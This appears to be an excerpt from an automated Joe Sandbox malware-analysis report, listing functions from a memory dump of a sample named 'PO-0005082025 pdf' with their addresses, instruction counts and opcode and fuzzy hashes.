Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27be34eb6a7794242250e6cfa355750e35f5828063952c135dab9ccfa863b499
Instruction ID: 1c05e0d4f2d906f4a15cc4c6e60e7f5aac812e309ac33140b991e753aef17c51
Opcode Fuzzy Hash: 27be34eb6a7794242250e6cfa355750e35f5828063952c135dab9ccfa863b499
Instruction Fuzzy Hash: B4018F31B10609EBDB14EB6ADC05AAAB7EDEFC0650B154129B909A7644EE20D902C692

Function 019EEB50 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2db55117c50c5c63757913a1de513521c2ed3f7e3668bbaad464345479facdbe
Instruction ID: 954d891ae5a0f8a82d668f5b93438b3f31cf2a3ce3ff2d40abf6fb60562a3372
Opcode Fuzzy Hash: 2db55117c50c5c63757913a1de513521c2ed3f7e3668bbaad464345479facdbe
Instruction Fuzzy Hash: 3B01A271244701AFD732DF1AD844F16BAE8EF95B50F15482AB60E9F390D6B0A841CB54

Function 01942582 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84b3032cd112c6223f994898d118834cea8f8e58364be9552da357343c0e99d4
Instruction ID: 5d93b2cc9e39a3e21b60ff8ec06940ca8e8221fc321ee771b47b9cffc9dd941c
Opcode Fuzzy Hash: 84b3032cd112c6223f994898d118834cea8f8e58364be9552da357343c0e99d4
Instruction Fuzzy Hash: 75F0D632651710B7C731DB5A9C40F07BBADEBC4B90F014028BA0997600C630ED01CBE0

Function 0196C073 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction ID: b6b4f5dac6f5627b3067a56065aee97a99c3b24ea6d99f8974b831773e996fb9
Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
Instruction Fuzzy Hash: EBF0C2B2600611ABE325CF4DDC40E67FBEEDBD1A80F058128A549D7220EA31ED05CB90

Function 0193C310 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction ID: 3d657e040773749c3292d65be1f3a1b3cb090308b91f085b5437a8c1a719ae87
Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
Instruction Fuzzy Hash: 23F0F633204E23ABDB32565D8840F2BAA998FD1BA5F1A0037E60DBB200CE709D0297D1

Function 0197CA6F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction ID: 778a86316e885460aefbd1bfc78e16c31d9c6a0081e5427834a4261f5c71de7d
Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
Instruction Fuzzy Hash: 7101F432200A86DFDB26E71EC949F99BBDDEF95B51F0844A5FE0C9B6A1D678C900C311

Function 01A161E5 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3b5d2f8dfba20c4ba8cbb4d870ecb41d07f9b0e9dc8e5857e3874f9c09d80ee
Instruction ID: 00ec358aa2d7a3e4ea9eb13b55bfe922b5b0f8b53808e5c158265361c6b7b126
Opcode Fuzzy Hash: e3b5d2f8dfba20c4ba8cbb4d870ecb41d07f9b0e9dc8e5857e3874f9c09d80ee
Instruction Fuzzy Hash: 5F014F71E012599BDB04DFA9D845AEEBBF8BF58710F14405AF905E7280D774EA02CBA8

Function 019C63C0 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction ID: f09691fbc0dbbecfcb64bf3abe109fe086d1a6b07c6350109edfc172ddc73807
Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
Instruction Fuzzy Hash: 9CF01D7220001DBFEF019F95DD80DAF7B7EEB997D8B104129FA15A2160D631DE21ABA0

Function 019CA4B0 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90e7d9c373e4f9cd8769edbd753bc0e6580a92f12c89789b9022df7748d29eee
Instruction ID: 41d757d190606ddb7f41c1c23d11e5ae1b43f647e84e7d56e139bf40bf5f8007
Opcode Fuzzy Hash: 90e7d9c373e4f9cd8769edbd753bc0e6580a92f12c89789b9022df7748d29eee
Instruction Fuzzy Hash: 2101893650024DABCF129E84DC40EDE7F66FB4CB54F058205FE1866220C332D971EB81

Function 0193C0F0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feafbf23d311970889b72a8ab61b343470bbc50ce8d21cfc7ad34b098f4179b5
Instruction ID: 2a535601c6a87e49d37866b70d111e87ea79122a66219c4821976fd0dbcde3fb
Opcode Fuzzy Hash: feafbf23d311970889b72a8ab61b343470bbc50ce8d21cfc7ad34b098f4179b5
Instruction Fuzzy Hash: 01F024723047425BF71496999C11F3273DAF7C0752F65806BEB0D9B2C5E970EC418394

Function 0197656A Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eeb03c2673e5a9bfeb452466fa372b67685e504edd9ad15c4190d4d9919b2b2
Instruction ID: 97ed0d97cb94c4e77999f7fcc2f4c9c0c6f7fe814cbe4e996ba0f5a66fa09683
Opcode Fuzzy Hash: 6eeb03c2673e5a9bfeb452466fa372b67685e504edd9ad15c4190d4d9919b2b2
Instruction Fuzzy Hash: F201A470601A82DFF322D72CCE48F6937A8BF80B40F480590BA0A9B6D6D728D501D614

Function 019E437C Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction ID: 94a1d5ce69d713421e93fb194254a1fd8e26bae72cecb1c3244ff15e86c489a2
Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
Instruction Fuzzy Hash: 01F0E93538191357E777AE2DC928B2EA6DD9FD0942B15252C964DCB640DF20E80087A0

Function 019CC89D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73cb50246d080ffd28603016ae9b415cc376b9a4fdfa112e2f4d5be2e8a01bb7
Instruction ID: b24695dfb95936b0559929e11abfcad60d63e577aed5c35a83c0b156162880da
Opcode Fuzzy Hash: 73cb50246d080ffd28603016ae9b415cc376b9a4fdfa112e2f4d5be2e8a01bb7
Instruction Fuzzy Hash: C7F0AF706053049FC310EF68C842A1BBBE4FF98750F40465EB89CDB390E634EA01CB96

Function 019CE872 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction ID: de0b3139ce88c6ea88b10147caf500e85f23ec16961e4c7a2fe09c3059c6c0d6
Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
Instruction Fuzzy Hash: 7CF05432B115119BD331DA4DCC80F17BB6CEFD5E60F590469AA4D9B260C760EC01C7D2

Function 01970854 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction ID: 5e2674df8a67906b37b2575553c26fab7c2c34504bc357d601e9d94a8ea8d51b
Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
Instruction Fuzzy Hash: E4F024B2610204AFE314DB21CC05F86B6E9FF99300F188078A949D7260FAB1ED00C654

Function 019CC912 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab0e14688fea0e64e175fa6a60b65f60cb31a97402c20dd9fa94162917e84a9
Instruction ID: 088fb0a147dfb27a7425105384d29c50f17c9db63b6fc99cbbf5e086122131ae
Opcode Fuzzy Hash: 7ab0e14688fea0e64e175fa6a60b65f60cb31a97402c20dd9fa94162917e84a9
Instruction Fuzzy Hash: 75F04F70A012499FCB04EFA9C515A9EBBB4EF58700F108159B959EB385DA34EA01CB51

Function 019447FB Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 966f546dbef8f813be26df7ed3c8ab67cda03a1e3d12fcfc9b2f00e3de178cf6
Instruction ID: 7a62e5804e02fc1074567f450413a40d2a315b65c550f06d1a60572970b7f5f8
Opcode Fuzzy Hash: 966f546dbef8f813be26df7ed3c8ab67cda03a1e3d12fcfc9b2f00e3de178cf6
Instruction Fuzzy Hash: 8AF0BE319167E59FF732CB6CC144F61BBDC9B00622F08896AD98D87B42C735D880CB52

Function 01A00115 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5faff31c20e3b0892552a296a2a411511806b24511a2df245d386922d24b5f30
Instruction ID: 624fee2408938210621cd2b2bc1a5eb47f7f21d744d4c0023eafbd9dd60b5b52
Opcode Fuzzy Hash: 5faff31c20e3b0892552a296a2a411511806b24511a2df245d386922d24b5f30
Instruction Fuzzy Hash: 65F05C2F419BC026CF335B3C7EA03D16F65A781260F0A1089F5BCD7245C6748583C320

Function 0197C5ED Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a9fa190f97f629837d434e408cc933644c301fde1cf88ce19831ff21b8932a0
Instruction ID: 2d3cf4a89e88dcecfba17cb2edd58ad124ee4ff7d17c7ca9900df889ec6ab18f
Opcode Fuzzy Hash: 8a9fa190f97f629837d434e408cc933644c301fde1cf88ce19831ff21b8932a0
Instruction Fuzzy Hash: ACF0E2B15116579FE322D71CC1C8B55BBDCAF447A2F099865D90E87552C360E880CA50

Function 01982619 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction ID: 4dc5aaf116c4ac363edab185ff0b6952a5ab7d56effe4bf74a1ce96f29ab223e
Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
Instruction Fuzzy Hash: 89E0D8723006412BE712AF598CC4F57776EDFD2B14F05007AB9085F252CAE2DC09C2A4

Function 019D6030 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction ID: 90f82bec4a5c42421e2076e4f9be3d9a9e1abea3533501c2716f86688dc1dfd7
Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
Instruction Fuzzy Hash: C4F03072154204AFE3218F4AD944F52BBF8EB45365F46C425E60D9B561D379EC40CBA4

Function 01940710 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction ID: 8caea3fc21dd38e91af3c100a8140f2b9bb6a2d70e2d5e9f1a8752b78e219d09
Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
Instruction Fuzzy Hash: F7F0E5392043459BDB16DF1AC440ED57BA8FB41350B040454FD4A8B341E735EA81CB51

Function 019749D0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction ID: 92eb61ad409f21b7efa5651f318365f158e3f3b2b2841b017bc5ad11a9cf4083
Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
Instruction Fuzzy Hash: 9BE0D832654185ABD3267A598800F6A77A9DFD07A1F160429E60C9B162EB70DC40D7D8

Function 019E678E Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction ID: 2705b66f96e81d6d337b9b7bce13df160ded90d34bbfe8000a2c6b3a0c8638d2
Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
Instruction Fuzzy Hash: B5E0D832640214BBDB229759CD05F9A7EBCDBA4E90F050055B604E7090D530EE00D690

Function 01A108C0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction ID: 27e2f268f9fb60bd080bcd6930fde22675f18c95f50a3791fd1b573cbaa41402
Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
Instruction Fuzzy Hash: 82E09B316443508BCB268B3DC240A53B7F8DF95664F158069ED054B616C231F882C6D0

Function 019425E0 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: aa14407a0246cf8b5d3c8f150281784d2e5a9d6ff1374dd6fb10e8d0a8dc54a4
Instruction ID: dadec67b3b6397616a40e4a689fa1a6e1fbe67ab136d146b781d9ea884188686
Opcode Fuzzy Hash: aa14407a0246cf8b5d3c8f150281784d2e5a9d6ff1374dd6fb10e8d0a8dc54a4
Instruction Fuzzy Hash: 91E09232100954ABC322FF29DD01F8A779AEFA07A0F014525B11957190CB30A910C794

Function 019FA456 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction ID: d534047f53909892689ea7c0ecd7267fbd7dd5bda39311f21aa92724f60bce0e
Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
Instruction Fuzzy Hash: C2E09231010612EFE732AF2AC808B56BBE9BF90B52F148C2CA19E124B0C77598C0CB40

Function 019C4000 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction ID: 684c45d67c3278a8a5dcc4f6e507938b3eed5c9a550809257d868e91208f2266
Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
Instruction Fuzzy Hash: 9FE0C2343403058FE715CF19C050B627BBABFD5A11F28C068A9888F205EB32E842CB41

Function 0193823B Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction ID: 7750171b6987012134c246e5ddbc1591549ebe9c15152f391ff3a917697de007
Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
Instruction Fuzzy Hash: 79E08C32401A10EFDB322F29DC00F5276A9FBD4B91F214A29F08E160A886B4A881CB44

Function 01942050 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79cd9cbdde1663e2d939c0a2b4881cf593616fa944a0e1e006ebc2fe00b9763
Instruction ID: 4412125d242d7258e0563a33f9879c05976f111714f25606e50971e243ce10b6
Opcode Fuzzy Hash: f79cd9cbdde1663e2d939c0a2b4881cf593616fa944a0e1e006ebc2fe00b9763
Instruction Fuzzy Hash: 42E0C2321004506BC312FF5DED01F4A739EEFE47A0F000121F55897290CB20AD01C7A4

Function 01978A90 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction ID: 8c45d3227d1bf5c642bb44b77d67973f24cc90153364efb0f3cd81086e84dbc9
Opcode Fuzzy Hash: 4861f5a381a69e507ddb33788bd9690c3cd67957beffc440e81982ecee0e9c4e
Instruction Fuzzy Hash: 18E08633511A1487C728EE18D515B7277A8EF45720F09463EA61747780C534E544C794

Function 01996AA4 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction ID: cb3ad914b1a6d0f5e207b902aa7728c77dd0ac88528d756acfe527aab5a53430
Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
Instruction Fuzzy Hash: 5BD05E36511A50AFC7329F1BEA00C13BBF9FBC5B51705062EA94983920C675A806CBA0

Function 0197E59C Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction ID: f9db0526eb8926f968e882347c88b930fbd02ebd635b0b9b014d0ad764d3543d
Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
Instruction Fuzzy Hash: AED0A932A24620ABDB72AA1CFC00FC333E8BB88761F060459B508C7150C360AC81CA84

Function 019BE908 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction ID: c728f72d492782976e92a71c07e9f42f845facc783841515fbaac5d795ef5dd1
Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
Instruction Fuzzy Hash: 09E0EC359506849BDF56DF99C680F9ABBB9FB94B40F150054A50C6B660C624A900CB40

Function 0193A0E3 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction ID: a4395eca186dcfcdb02681973f7e5a5c1c35abecee95c5607ea0550c59f9c09c
Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
Instruction Fuzzy Hash: 3AD0223222603093CB289695A800F63AA09EBC1AD0F0A002C380EE3800C0048C42C2E0

Function 0197A830 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction ID: 302f54043d78046d8abbcc0980d31e0e20f78a7cc38966ca9130932ee5db6d07
Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
Instruction Fuzzy Hash: F6D012371E054DBBCB11DF66DC01F957BA9E7A4BA0F444020B908875A0C63AE950D684

Function 0197CA24 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2292380085.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1910000_PO-0005082025 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cdde8f58cb8fb0c454eacec4b254e28c0a0e31907c0e8d01e5514d6b7105409
Instruction ID: 2c5a947b068a194748fdc8da4be9989c03f3b8ce43442a9cf28a2c9716b8f246
Opcode Fuzzy Hash: 0cdde8f58cb8fb0c454eacec4b254e28c0a0e31907c0e8d01e5514d6b7105409
Instruction Fuzzy Hash: E1D0A734515402DBDF1FEF08CA50E6E3F79FF14A82B40006CEB0851020E328DD01C710

